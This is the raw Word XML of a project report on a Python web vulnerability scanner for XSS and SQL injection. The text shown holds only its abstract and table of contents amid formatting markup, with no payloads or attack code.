        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>a</w:t>
      </w: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both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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an era where web applications are integral to business operations and user interactions, ensuring their security is paramount. This project</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Web Vulnerability Scanner</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presents a comprehensive vulnerability scanner designed to detect and report critical security flaws, specifically Cross-Site Scripting (XSS) and SQL Injection (SQLi) vulnerabilities. Leveraging Python and popular libraries such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and Selenium, the scanner systematically crawls web applications, identifying potential attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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scanner features an automated login mechanism, supporting both standard web applications and specialized environments like the Damn Vulnerable Web Application (DVWA). It incorporates robust payload injection techniques to test for XSS and SQLi vulnerabilities across various endpoints, including URLs and form inputs. The scanner's modular design allows for easy integration and customization, accommodating different payloads and attack methodologies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="PMingLiU"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId5" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="810" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgBorders w:offsetFrom="page">
            <w:top w:val="single" w:color="auto" w:sz="18" w:space="24"/>
            <w:left w:val="single" w:color="auto" w:sz="18" w:space="24"/>
            <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="24"/>
            <w:right w:val="single" w:color="auto" w:sz="18" w:space="24"/>
          </w:pgBorders>
          <w:cols w:space="708" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:id w:val="147483108"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"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3" w:name="_Toc43339130"/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="18"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-2" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="single"/>
              <w14:textFill>
                <w14:solidFill>
                  <w14:schemeClr w14:val="tx1"/>
                </w14:solidFill>
              </w14:textFill>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w: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_Toc5390 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Introduction to Proj</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
              <w:lang w:val="en-IN"/>
            </w:rPr>
            <w:t>e</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>ct</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc5390 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1</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_Toc13884 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Purpose of Project</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13884 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1</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_Toc25296 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t xml:space="preserve">Problems in </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:lang w:val="en-IN"/>
            </w:rPr>
            <w:t>E</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t xml:space="preserve">xisting </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:lang w:val="en-IN"/>
            </w:rPr>
            <w:t>S</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>ystem</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25296 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2</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_Toc19191 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Solutions to these Problems</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19191 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2</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_Toc4965 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Objectives of Project</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4965 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>3</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_Toc2812 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Features of Project</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2812 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>4</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_Toc4034 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>System Analysis</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4034 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>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_Toc25664 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>Introduction</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25664 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>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_Toc3591 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>Analysis Model</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3591 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>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_Toc27619 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Project Planning</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27619 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>9</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_Toc3562 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Understanding the topic</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3562 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>9</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_Toc19827 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:bCs/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>Proposed Modules:</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19827 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>12</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_Toc21679 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Modular break-up of the system</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21679 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>12</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_Toc2407 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Process logic for each module</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2407 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>13</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_Toc30758 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>File structure requirements</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30758 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>13</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_Toc162 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Documentation</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc162 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>13</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_Toc14007 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Feasibility Study</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14007 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>14</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_Toc31949 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Technical Feasibility</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31949 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>14</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_Toc11452 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Operational Feasibility</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11452 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>15</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_Toc9419 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Economic Feasibility</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9419 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>15</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_Toc14775 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Requirement Specifications</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14775 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>16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_Toc1435 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>Hardware Specifications</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1435 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>16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9"/>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_Toc15396 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>Software Specifications</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15396 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>16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_Toc23386 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Modules of This Project</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23386 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>17</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_Toc16633 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Methodology</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16633 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>19</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_Toc25413 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
